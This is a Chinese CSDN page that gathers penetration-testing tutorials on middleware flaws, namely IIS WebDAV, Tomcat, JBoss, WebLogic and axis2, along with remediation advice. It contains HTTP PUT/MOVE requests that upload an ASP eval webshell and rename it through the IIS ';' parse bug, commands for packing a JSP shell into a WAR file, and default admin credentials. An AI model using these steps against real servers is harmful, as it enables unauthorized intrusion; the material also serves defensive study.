webdav漏洞导致getshell_webdav漏洞 - CSDN
精华内容
参与话题
  • 0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。 使应用程序可直接对Web...IIS实现Webdav是采用的其两种接口CGI、ISAPI的ISAPI

    0x00 简介


    WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。

    使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。

    IIS实现Webdav是采用的其两种接口CGI、ISAPI的ISAPI接口。

    但因为其没有采用影射的方式,所以IIS的主程序w3svc.dll本身包含了Webdav的信息。

    其识别出是Webdav的请求后就调用Webdav的处理模块httpext.dll。

    对于常见几种请求方法GET、HEAD、POST等,因为常见一些映射都支持。

    所以不能以请求方法作为Webdav请求的判断,w3svc.dll就根据请求头的字段识别。

    如果请求头里面包含Translate:If:Lock-Token:中的一种,就认为是Webdav的请求。

    Translate:就是那个Translate:f的泄露源代码的一个请求头,其实设置别的两个也是一样的。

    可能很多IDS是没有这点知识的。W3svc.dll还内置了几个别的请求方法TRACKTRACE等。

    TRACK就是用于调试错误的,如果收到这样的请求头,w3svc.dll会原样返回请求数据。

    相当于我们常见的ping.exe。

    IIS对TRACK请求没有进行LOG记录,这点我们可以用于来获得banner。

    对于IIS将优于大家习惯使用的HEAD

    如果上面的请求方法没匹配,那么w3svc.dll就会认为是Webdav的请求,交给httpext.dll处理了。

    这些请求包含Webdav支持的PROPFINDPROPPATCHMKCOLDELETEPUTCOPYMOVELOCKUNLOCK等。

    0x01 配置


    为了安全上的考虑,IIS默认并不会启动WebDAV的功能,因此必须另外来激活它。

    通过启动“IIS管理器”,展开本地计算机,选择“Web服务扩展”,选择“允许”的途径来启动WebDAV功能。

    开启WebDAV之后,IIS就支持PROPFINDPROPPATCHMKCOLDELETEPUTCOPYMOVELOCKUNLOCK等方法了。

    enter image description here

    当IIS中的配置允许写入的时候就可以直接PUT文件上去,由此可能引发非常严重的安全问题,强烈建议禁制

    enter image description here

    0x02 危害


    当开启了WebDAV后,IIS中又配置了目录可写,便会产生很严重的问题。 wooyun上由此配置产生的问题很多,并且有老外黑了一群中国政府站有一部分就是由于此配置。 危害巨大,操作简单,直接批量扫描,上传shell。

    WooYun: 闪动科技webserver配置不当可取shell

    WooYun: 瑞达信息安全产业股份有限公司IIS写入漏洞

    WooYun: 海航webdav漏洞导致服务器沦陷

    WooYun: 阿里某邮件系统服务器配置不当

    WooYun: 国家某局某文件系统存在严重安全问题

    WooYun: 国内某大型风电工控系统应用配置失误

    0x03 查找存在问题的服务器


    对服务器发送OPTION包:

    OPTIONS / HTTP/1.1
    Host: www.test.com
    

    返回响应头如下:

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    MS-Author-Via: DAV
    Content-Length: 0
    Accept-Ranges: none
    DASL: <DAV:sql>
    DAV: 1, 2
    Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
    Cache-Control: private
    

    当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV。

    此时可以用PUT上传文件,但是不可以直接上传可执行脚本文件,可以先上传一个其他类型的文件,然后MOVE成脚本文件。

    PUT /test.txt HTTP/1.1
    Host: www.test.com
    Content-Length: 23
    
    <%eval request("a")%>
    

    启用了“WebDAV”扩展,并且复选了“写入”,就可以写入txt文件了。要想使用MOVE命令将其更名为脚本文件后缀,必须还复选上“脚本资源访问”。

    但是发现利用IIS的解析漏洞,可以MOVE成test.asp;.jpg,然后就可以当做shell来执行了

    MOVE /test.txt HTTP/1.1
    Host: www.test.com
    Destination: http://www.test.com/test.asp;.jpg
    

    有一个开源的DAV管理工具,使用工具直接查看:

    http://www.davexplorer.org/download.html

    0x03 修复方案


    1 禁用WebDAV。

    通常情况下网站不需要支持额外的方法,右键WebDAV,点击禁用即可。

    2 如果要使用WebDAV的话,加上权限验证。

    如果选取“脚本资源访问”,则用户将具备修改WebADV文件夹内的脚本文说明件(scriptfile)的功能。

    除了此处的虚拟目录权限外,还需要视NTFS权限,才可以决定用户是否有权限来访问WebDAV文件夹内的文件。

    WebDAV文件夹的NTFS权限给予用户适当的NTFS权限。

    首先请设置让Everyone组只有“读取”的权限,然后再针对个别用户给予“写入”的权限,例如我们给予用户“User”写入的权限。

    选择验证用户身份的方法启动“IIS管理器”,然后右击WebDAV虚拟目录,选择“属性”→“目录安全性”,单击“身份验证和访问控制”处的编辑按钮。

    不要选取“启用匿名访问”,以免招致攻击。选择安全的验证方法,选择“集成Windows身份验证”。

    enter image description here

    参考:

    http://hi.baidu.com/yuange1975/item/a836d31096b5b959f1090e89

    http://www.daxigua.com/archives/1597

    http://www.daxigua.com/archives/2750

    http://www.daxigua.com/archives/2747

    http://blog.163.com/wfruee@126/blog/static/4116699420123261427232/

    展开全文
  • 浅谈中间件漏洞与防护

    千次阅读 2018-06-23 11:52:09
    中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。那么从实际情况来看,预防这种漏洞最大的难点,在于...
    中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。那么从实际情况来看,预防这种漏洞最大的难点,在于中间件安全该由谁负责?

        我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关;运维人员就一脸蒙蔽了,反驳道:你们当初没跟我说要配置什么啊,只是让我安装个程序就ok了,我怎么知道?
     那么除此之外,开发人员以及运维人员对中间件安全意识的缺失也是一个重要因素,有些开发商可能会对自身代码进行安全检测,但只对代码部分进行审查是远远不够的。本篇用来记录总结一些常见的web中间件漏洞以及防护问题(记录的只是一部分,不代表全部),内容一部分摘自道哥的《白帽子讲web安全》一书,算做读书笔记亦或者读后感。

    中间件、容器、服务器傻傻分不清?

      在谈中间件安全问题时,我觉得有必要先梳理下以上几种关系以及概念。当初我在接触这些概念时,脑子里就是一团浆糊,中间件、容器、服务器、webserver等等概念感觉彼此很相似,但又有所区别。因此在书写本篇时,我特意翻查了一些资料,试图梳理清这几者之间的关系,参考了文章:http://www.voidcn.com/blog/saoraozhe3hao/article/p-2428756.html

    基础概念与作用

    这里只介绍web中间件、web服务器、web容器,因为除了web以外,其概念还可以扩展为数据库等。

    web服务器

    web服务器用于提供http服务,即向客户端返回信息,其可以处理HTTP协议,响应针对静态页面或图片的请求,控制页面跳转,或者把动态请求委托其它程序(中间件程序)等。

    web中间件

    web中间件用于提供系统软件和应用软件之间的连接,以便于软件各部件之间的沟通,其可以为一种或多种应用程序提供容器。

    web容器

    web容器用于给处于其中的应用程序组件(JSP,SERVLET)提供一个环境,是中间件的一个组成部分,它实现了对动态语言的解析。比如tomcat可以解析jsp,是因为其内部有一个jsp容器。

    所属的类别

    web服务器:IIS、Apache、nginx、tomcat、weblogic、websphere等。
    web中间件:apache tomcat、BEA WebLogic、IBM WebSphere等。
    web容器:JSP容器、SERVLET容器、ASP容器等。

    注意:web中间件与web服务器是有重叠的,原因在于tomcat等web中间件也具备web服务器的功能。

    重点分析

      web服务器只是提供静态网页解析(如apache),或者提供跳转的这么一种服务。而web中间件(其包含web容器)可以解析动态语言,比如tomcat可以解析jsp(因为tomcat含有jsp容器),当然它也可以解析静态资源,因此它既是web中间件也是web服务器。不过tomcat解析静态资源的速度不如apache,因此常常两者结合使用。

    Tomcat漏洞与防护

      tomcat是apache的一个中间件软件,其可以提供jsp或者php的解析服务,为了方便远程管理与部署,安装完tomcat以后默认会有一个管理页面,管理员只需要远程上传一个WAR格式的文件,便可以将内容发布到网站,这一功能方便了管理员的同时也给黑客打开了方便之门,除此之外,tomcat还有一些样本页面,如果处理不当也会导致安全问题。

    tomcat远程部署漏洞详情

    tomcat管理地址通常是:


    默认账号密码:

    tomcat口令爆破

      在默认不对tomcat做任何配置的时候爆破是无效的,而如果设置了账号密码就可以进行爆破。Tomcat的认证比较弱,Base64(用户名:密码)编码,请求响应码如果不是401(未经授权:访问由于凭据无效被拒绝。)即表示登录成功。登录成功后,可直接上传war文件,getshell(当然上传war文件需要manager权限)

    getshell过程

    首先将我们的.jsp shell文件打包为war文件:

    登录管理页面后,选择上传war文件。

    截图中间的目录便是上传成功以后的木马文件,可以点击浏览。

    直接在当前目录下访问shell.jsp。

    Session Example样本页面

    默认地址:

    用来设置任意会话变量,恶意使用可对应用程序造成破坏。

    tomcat漏洞防护

    • 升级tomcat版本
    • 删除远程部署页面,或者限定页面的访问权限。
    • 找到/conf/tomcat-users.xml修改用户名密码以及权限。
    • 删除样例页面文件

    JBoss漏洞与防护

    JBoss这是一个基于JavaEE的应用服务器,与tomcat类似的是jboss也有远程部署平台,但不需要登陆。漏洞利用过程与tomcat类似,因此不再截图说明。除了远程部署漏洞外,jboss还存在反序列化漏洞,这里不再详述。

    JBoss远程部署漏洞详情

    默认管理后台地址:

    getshell过程  

      访问管理页面,查看jboss配置页面中的JMX Console,这是JBoss的管理台程序,进入后找到Jboss.deployment包,该包下有flavor=URL.type=DeploymentSccanner选项。进入部署页面后便可以上传war文件,但与tomcat不同的是它不是本地上传war文件,而是从远程地址下载,因此需要自己准备一个文件服务器,用于远程下载war到目标jboss服务器上。具体方法是在部署页面找到”ADDURL”方法,输入URL地址,点击invoke。除了以上方法外,JMX-Console提供的BSH方法,同样也可以部署war包。

    JBoss漏洞防护

    • 开启jmx-console密码认证
    • 删除jmx-console.war与web-console.war

    WebLogic漏洞与防护

    weblogic是一个基于JavaEE构架的中间件,安装完weblogic默认会监听7001端口。漏洞利用过程与tomcat类似,因此不再截图说明。

    Weblogic远程部署漏洞详情

    默认后台地址:

    账号密码:

    • 用户名密码均为:weblogic
    • 用户名密码均为:system
    • 用户名密码均为:portaladmin
    • 用户名密码均为:guest

    getshell过程

    成功登陆weblogic后台后,找到部署按钮,点击后选择安装,然后可以选择本地上传war包也可以利用远程url下载,部署完成后,weblogic会给出文件地址。

    Weblogic漏洞防护

    • 删除远程部署页面

    axis2漏洞与防护

    axis2也是apache的一个项目,是新一代的SOAP引擎,其存在一个任意命令执行漏洞。(该漏洞来自补天平台)

    axis2命令执行漏洞详情

    默认后台地址:

    默认账号密码:admin与axis2
    登录后效果如下:

    执行系统命令poc

    IIS漏洞与防护

      IIS是微软的一款web服务器,其配置不当容易产生webdav漏洞。webdav本身是iis的一项扩展功能,开启后可以使用除了get、post以外的一些请求类型,比如put等。但如果配置不当,就会导致文件上传漏洞。除了webdav漏洞,近期还爆出了一个远程命令执行漏洞,CVE-2017-7269。

    IIS Webdav漏洞详情

      当测试一个站点是否存在webdav漏洞时,可以先构造一个OPTIONS请求,若返回200,则查看返回头的Allow参数中包含哪些方法(可以请求)。

    如果存在PUT方法,则可以尝试写入一个txt文件。

    若返回200则说明上传成功,此时可以手动访问此文件,确认是否存在。当然也有可能返回403,这表示此目录没有上传的权限,可以尝试上传到其他目录。
    通过MOVE或COPY方法改文件后缀名。

    IIS漏洞防护

    关闭webdav功能

    Apache漏洞与防护

      Apache本身也存在一些漏洞,比如slowhttp漏洞,当然官方认为其是apache的特性而不算是一种漏洞,然而事实证明它的危害真的很大。除了slowhttp漏洞以外,其第三方moudle存在很多反序列化或者远程命令执行的漏洞。

    Apache slowhttp漏洞详情

    关于slowhttp漏洞请移步:https://blog.csdn.net/fly_hps/article/details/80782127

    HPP漏洞

    HPP漏洞是web容器处理http参数时的问题,前面几款web服务器都或多或少存在这样的问题。

    比如访问URL:

    此时页面显示hello
    但如果访问:

    此时页面显示nmask,把前面参数的值给覆盖了,这就是http参数污染。

    利用场景

    绕过WAF,如:

    因为WAF可能会校验值的第一个单词,如果为select则触发,这样子可以避免被触发。

    展开全文
  • 平台安全之中间件安全

    千次阅读 2018-06-01 18:04:36
    理解中间件一次web访问的顺序,web浏览器-&gt;web服务器(狭义)-&gt;web容器-&gt;应用服务器-&gt;数据库服务器web服务器广义:提供广义web服务的软件或主机狭义:提供w3服务的软件或主机,即Web...

    理解中间件

    一次web访问的顺序,web浏览器->web服务器(狭义)->web容器->应用服务器->数据库服务器

    web服务器

    广义:提供广义web服务的软件或主机

    狭义:提供w3服务的软件或主机,即Web服务器软件或装有Web服务器软件的计算机。例如:IIS、Apache、nginx、Lighttpd。Web服务器可以处理 HTTP 协议,响应针对静态页面或图片的请求,进行页面跳转,或者把动态请求委托其它程序(它的扩展、某种语言的解释引擎、Web容器)。

    web容器

    容器:作为操作系统和应用程序之间的桥梁,给处于其中的应用程序组件提供一个环境,使应用程序直接跟容器中的环境变量交互,不必关注其它系统问题。例如:tomcat(拥有JSP容器,servlet容器),Jboss(拥有EJB容器)。

    web容器:处理http的容器,例如tomcat(拥有JSP容器,servlet容器),IIS(拥有ASP容器)。

    应用服务器

    中间件:为一种或多种应用程序提供容器,同时为应用程序提供相关服务。

    应用服务器:用于被其他应用服务器或web服务器调用的中间件。例如Tomcat,WebLogic,WebSphere,Jboss

    IIS,Tomcat,WebLogic,WebSphere即是应用服务器,又拥有web服务器的功能。

    Tomcat漏洞与服务

    Tomcat简介

    tomcat是apache的一个中间件软件,其可以提供jsp或者php的解析服务,为了方便远程管理与部署,安装完tomcat以后默认会有一个管理页面,管理员只需要远程上传一个WAR格式的文件,便可以将内容发布到网站,这一功能方便了管理员的同时也给黑客打开了方便之门,除此之外,tomcat还有一些样本页面,如果处理不当也会导致安全问题。

    弱点测试

    默认后台密码

    后台地址:http://www.test.com:8080/manager

    默认密码:


    管理后台爆破

    一般tomcat后台登录口不做任何安全处理,可以无限次尝试登入。

    后台上传shell

    1 将我们的jsp马打包成war文件 命令:jar -cvf shell.war shell.jsp

    2 将之前打包的war包上传部署

    安全防护

    1 修改/conf/tomcat-users.xml中的帐号密码(越复杂越好)

    2 升级tomcat版本

    3 删除远程部署页面

    Jboss漏洞与防护

    Jboss简介

    JBoss这是一个基于JavaEE的应用服务器,与tomcat类似的是jboss也有远程部署平台,但不需要登陆。漏洞利用过程与tomcat类似,因此不再截图说明。除了远程部署漏洞外,jboss还存在反序列化漏洞,这里不再详述。

    弱点测试

    管理后台弱口令

    后台页面:http://www.test.com:8080/jmx-console/

    后台上传部署war包获取webshell

    命令执行

    1 /invoker/EJBInvokerServlet

    2 /invoker/JMXInvokerServlet

    3 /admin-console/login.seam

    4 /web-console/Invoker

    5 Application Deserialization

    6 Servlet Deserialization

    7 Apache Struts2 CVE-2017-5638

    测试工具:https://github.com/joaomatosf/jexboss

    安全防护

    1 关闭jmx-console

    2 关闭web-console

    3 删除/invoker/EJBInvokerServlet

    4 删除/invoker/JMXInvokerServlet

    5 升级jboss

    WebLogic漏洞与防护

    WebLogic简介

    weblogic是一个基于JavaEE构架的中间件,安装完weblogic默认会监听7001端口。

    弱点测试

    后台弱口令

    默认后台: http://www.test.com:7001/console/login/loginForm.jsp

    默认密码:


    后台上传部署war包获取webshell

    测试工具:https://github.com/dc3l1ne/Weblogic-Weakpassword-Scnner

    命令执行

    1 反序列化命令执行

    测试工具:https://github.com/hanc00l/weblogic_unserialize_exploit

    安全防护

    1 加强密码管理,使用复杂的密码

    2 删除远程部署文件

    3 后台限制登录IP

    axis2命令执行漏洞

    axis2简介

    axis2也是apache的一个项目,是新一代的SOAP引擎

    弱点测试

    默认后台弱口令

    默认后台:http://www.test.com/axis2-admin/

    默认口令:admin与axis2

    登录后台上传shell

    1 打包一个aar文件

    2 上传部署

    3 参考文章:http://javaweb.org/?p=1548

    安全防护

    1 后台登录限制IP

    2 加大密码复杂度

    IIS漏洞与防护

    IIS简介

    IIS是微软的一款web服务器,其配置不当容易产生webdav漏洞。webdav本身是iis的一项扩展功能,开启后可以使用除了get、post以外的一些请求类型,比如put等。但如果配置不当,就会导致文件上传漏洞。

    弱点测试

    IIS写权限漏洞

    漏洞说明:此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

    检测方式:

    1 构造OPTION包向服务器提交


    返回结果如下:



    当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV。

    此时可以用PUT上传文件,但是不可以直接上传可执行脚本文件,可以先上传一个其他类型的文件,然后MOVE成脚本文件。


    启用了“WebDAV”扩展,并且复选了“写入”,就可以写入txt文件了。要想使用MOVE命令将其更名为脚本文件后缀,必须还复选上“脚本资源访问”。

    但是发现利用IIS的解析漏洞,可以MOVE成test.asp;.jpg,然后就可以当做shell来执行了


    命令执行

    漏洞条件:iis 6.0 + webdav

    利用POC:https://github.com/edwardz246003/IIS_exploit

    安全防护

    1 禁用WebDAV

    2 如果要使用WebDAV的话,加上权限验证




    展开全文
  • IIS-文件解析漏洞

    千次阅读 2019-07-22 19:08:26
    IIS6.0有2种解析漏洞 1. 目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2. 文件解析 *.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 *.asp文件执行。 目录...

    IIS6.0有2种解析漏洞

    1.  目录解析

    以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。

    2. 文件解析

    *.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 *.asp文件执行。

    目录解析复现

    ii6.0的服务器开启Active Server Pages服务拓展

     新建一个text.jpg的文件

     

    进行常规的访问 192.168.61.134/test.jpg

    图片会被认为是图片格式,导致显示出错

    这个时候我们新建一个文件夹为test.asp并把刚刚的test.jpg拖进去,再次进行访问

     

     

    文件解析漏洞

    ii6.0的服务器开启Active Server Pages服务拓展

    新建一个admin.asp;.jpg文件内容为

     

     

     

    进行访问http://192.168.61.134/admin.txt;.asp

     

    配合PUT漏洞GET shell

     

    在iis6.0中若只开启了WebDAV,但并没有开放脚本资源的访问权限的话。是不能通过MOVE来把put

    上去的txt文件变成asp文件。

    虽然没开脚本资源访问权限,但是可以通过move改成后缀为txt的文件名。配合文件解析漏洞可getshell。

     

    没有开放脚本资源访问的权限,无法通过txt改为asp。

    我们先put一个asp一句话

     

     

     

    在用move的方式改为shell.asp;.txt

     

    然后用菜刀连接

     

    展开全文
  • 渗透测试之中间件安全

    千次阅读 2019-05-21 22:49:14
    漏洞 可利用度 利用场景 6.0 Put漏洞 (默认状态?) Webshell上传 1.0-10.0(全版本) 短文件名猜解 低 敏感文件下载,猜后台,猜敏感文件 6.0 远程代码执行(ms-16-016) 高 提权 ...
  • Web安全——上传漏洞

    千次阅读 2019-03-21 20:54:09
    如果当文件上传时没有对文件的格式做验证,导致用户可以上传任意文件,那么这就是一个上传漏洞。 1. 解析漏洞 攻击者在利用上传漏洞时,通常会与 Web 容器的解析漏洞配合在一起。 ① IIS 解析漏洞 IIS 6.0 在解析...
  • 危险的HTTP PUT

    千次阅读 2018-12-13 19:35:52
    Web服务器上启用了HTTP PUT方法,配置不当可以直接上传后门文件到服务器,直接getshell。 测试环境: 攻击机器:kali linux 靶机:metasploitables2 0x001 判断 #nmap 扫 80/tcp open ...
  • Metasploit 整理笔记

    万次阅读 2015-07-12 14:50:49
    有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。...
  • 在bwapp中造作一番

    千次阅读 2018-12-13 16:01:58
    是一个很受欢迎的web攻击靶场,经由同学介绍正是入手,姑且把它看作傻瓜式的dvwa,包含有100多个漏洞  SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP,PHP Code, Host Header and S...
  • 从零开始学习 kali-渗透 7月27日

    千次阅读 2018-07-27 22:41:08
    端口扫描 nmap -sS 目标ip Arp 内网断网 Arpspoof -i 网卡 -t 目标ip 网关 获取网卡/网关 ifconfig 获取内网ip fping -asg 192.168.1.0/24 Arp 欺骗 echo 写命令,是不会有回显的 ehco 1 &...dr...
  • 计算机安全知识大全

    万次阅读 2007-12-07 11:45:00
    一、未雨绸缪——做好预防措施 1.一个好,两个妙 无论是菜鸟还是飞鸟,杀毒软件和网络防火墙都是必需的。上网前或启动机器后马上运行这些软件,就好像给你的机器“穿”上了一层厚厚的“保护衣”,就算不能完全杜绝...
  • 仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。https://www.cnblogs.com/ssooking/p/6192995.htmlrun vnc 无法操作的远程桌面1、background命令返回,把meterpreter后台挂起2、session命令session 命令...
  • 计算机必要知识

    万次阅读 2007-02-26 18:28:00
    net命令介绍这篇文章综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系 统关于NET命令的解释,希望可以全面一些 先说一些: (1)NET命令是一个命令行命令。 (2)管理网络环境、服务、用户、...。。。...
  • 模糊测试--强制性安全漏洞发掘

    万次阅读 2015-01-13 16:41:52
    前 言 我知道"人类和鱼类能够和平共处" 。 ...--George W....模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序,包括Microsoft的Internet Explorer、W
  • AppScan扫描建议

    万次阅读 2014-09-10 14:56:18
    通过验证用户输入未包含危险字符,便可能防止恶意的用户导致应用程序执行计划外的任务,例如:启动任意 SQL 查询、嵌入将在客户端执行的 Javascript 代码、运行各种操作系统命令,等等。 建议过滤出所有以下字符...
  • 掌握中间件漏洞,对渗透测试有很大的帮助,例如 Apache和iis的解析漏洞,以及weblogic反序列化漏洞 基础概念与作用 这里只介绍web中间件、web服务器、web容器,因为除了web以外,其概念还可以扩展为数据库等。 ...
  • 初探Meterpreter

    万次阅读 2013-12-30 11:21:53
    强大的Meterpreter,让目标机像你的孩子一样听话~~
1 2 3 4 5 ... 13
收藏数 257
精华内容 102
关键字:

webdav漏洞导致getshell